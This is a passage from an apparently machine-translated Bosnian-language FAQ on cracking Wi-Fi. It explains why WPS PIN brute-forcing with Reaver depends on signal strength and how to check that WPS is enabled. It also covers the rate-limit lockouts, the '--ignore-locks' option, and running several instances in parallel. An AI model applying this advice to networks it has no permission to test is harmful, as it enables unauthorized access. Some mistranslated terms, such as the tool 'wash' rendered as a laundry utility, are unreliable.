Odgovor: Tipično, WEP krekiranje se dešava ponovnim slanjem uhvaćenih paketa kako bi se dobilo više vektora inicijalizacije (IV) potrebnih za uspješno razbijanje. U ovom slučaju, nije važno da li se paket izgubio ili nekako oštetio na putu. Ali da biste napali WPS, potrebno je striktno slijediti protokol prijenosa paketa između pristupne točke i Reavera kako biste provjerili svaki PIN kod. A ako se u isto vrijeme neki paket izgubi ili dođe u nepristojnom obliku, tada ćete morati ponovo uspostaviti WPS sesiju. Zbog toga WPS napadi mnogo više ovise o jačini signala. Takođe je važno zapamtiti da ako vaš bežični adapter vidi pristupnu tačku, to ne znači da pristupna tačka vidi vas. Pa ako jesi sretan vlasnik adapter velike snage iz ALFA mreže i antenu za par desetina dBi, onda se nemojte nadati da ćete uspjeti razbiti sve uhvaćene pristupne tačke.

Pitanje: Reaver stalno šalje isti PIN pristupnoj tački, šta nije u redu?

Odgovor: Provjerite da li je WPS omogućen na ruteru. To se može učiniti pomoću uslužnog programa za pranje: pokrenite ga i provjerite je li vaša meta na listi.

P: Zašto se ne mogu povezati sa pristupnom tačkom?

Odgovor: Ovo može biti zbog slabe jačine signala ili zato što vaš adapter nije prikladan za takva istraživanja.

Pitanje: Zašto stalno dobijam greške „otkriveno ograničenje brzine“? Odgovor: To je zato što je pristupna tačka blokirala WPS. Obično je to privremeno blokiranje (oko pet minuta), ali u nekim slučajevima se može izreći i trajna zabrana (deblokiranje samo preko administrativnog panela). Postoji jedna gadna greška u Reaver verziji 1.3, zbog koje uklanjanje takvih brava nije otkriveno. Kao zaobilazno rješenje, predlaže se korištenje opcije '--ignore-locks' ili preuzimanje najnovije verzije sa SVN-a.

Pitanje: Da li je moguće pokrenuti dvije ili više instanci Reavera u isto vrijeme da biste ubrzali napad?

Odgovor: Teoretski, moguće je, ali ako izvade istu pristupnu tačku, tada je malo vjerovatno da će se brzina nabrajanja povećati, jer je u ovom slučaju ograničena slabim hardverom pristupne točke, koja je već u potpunosti opterećena jednom napadač.



Učitavanje...
Top